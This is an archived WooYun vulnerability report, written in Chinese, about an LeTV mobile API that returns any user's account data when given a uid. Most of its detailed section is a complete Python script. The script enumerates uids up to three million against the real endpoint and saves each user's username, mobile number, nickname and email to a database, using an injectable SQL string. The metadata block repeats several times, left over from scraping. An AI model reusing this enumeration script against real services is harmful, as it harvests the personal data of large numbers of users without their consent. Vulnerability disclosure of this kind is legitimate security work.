乐视网某接口限制不当可读取任意用户信息(续)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061919

漏洞标题：乐视网某接口限制不当可读取任意用户信息(续)

漏洞作者：啊L川

提交时间：2014-05-22 21:24

修复时间：2014-07-06 21:24

公开时间：2014-07-06 21:24

漏洞类型：敏感信息泄露

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-22：细节已通知厂商并且等待厂商处理中
2014-05-22：厂商已经确认，细节仅向厂商公开
2014-06-01：细节向核心白帽子及相关领域专家公开
2014-06-11：细节向普通白帽子公开
2014-06-21：细节向实习白帽子公开
2014-07-06：细节向公众公开

简要描述：

http://www.wooyun.org/bugs/wooyun-2014-055595
菜鸟学安全发现漏洞公开，但是没有修复，不知道厂商是怎么个流程！

详细说明：

感谢@进化程序猿
遍历uid可以获取乐视网所有的用户数据，通过传参发现，用户id已经超过3500000，至少有3500w用户了吧
既然这样那
写个脚本遍历下吧纯属菜鸟，，，，，
厂商要重视呀（数据已删除）

#-*- coding: utf-8 -*-
#!/usr/bin/python
__author__ = 'alchuan'
import sys
import json
import urllib2
import MySQLdb
reload(sys)
sys.setdefaultencoding('utf-8')
def getcontent(uid):
    id = bytes(uid)
    url = 'http://dynamic.app.m.letv.com/android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid='+id+'&pcode=010210000&version=5.0'
    req = urllib2.Request(url)
    response = urllib2.urlopen(req)
    respHtml = response.read()
    response.close()
    return chulijson(respHtml)
def chulijson(data):
    ddata = json.loads(data)
    for a in ddata.keys():
        if (a == 'bean'):
            dirc = ddata['bean']
            #print dirc
            if dirc:
                if (dirc['username'] != ''):
                    sql = "INSERT INTO `leshi_com` (uid, username, mobile, nickname, email) VALUES ('%s', '%s', '%s', '%s', '%s')" % (dirc['uid'], dirc['username'], dirc['mobile'], dirc['nickname'], dirc['email'])
                    #print sql
                    adddata(sql)
                else:
                    pass
            else:
                pass
        else:
            pass
def adddata(sql):
    db = MySQLdb.connect('localhost', 'root', '', '****')
    cursor = db.cursor()
    try:
        cursor.execute(sql)
        db.commit()
    except:
        db.rollback()
    db.close()
#getcontent(1102594)
for x in range(2, 3000000):
    getcontent(x)
else:
    print "end"

漏洞证明：

修复方案：

版权声明：转载请注明来源啊L川@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：4

确认时间：2014-05-22 21:51

厂商回复：

感谢挖掘，马上修复！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061919

漏洞标题：乐视网某接口限制不当可读取任意用户信息(续)

相关厂商：乐视网

漏洞作者：啊L川

提交时间：2014-05-22 21:24

修复时间：2014-07-06 21:24

公开时间：2014-07-06 21:24

漏洞类型：敏感信息泄露

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源啊L川@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061919

漏洞标题：乐视网某接口限制不当可读取任意用户信息(续)

相关厂商：乐视网

漏洞作者： 啊L川

提交时间：2014-05-22 21:24

修复时间：2014-07-06 21:24

公开时间：2014-07-06 21:24

漏洞类型：敏感信息泄露

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-061919"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 啊L川@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：啊L川

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源啊L川@乌云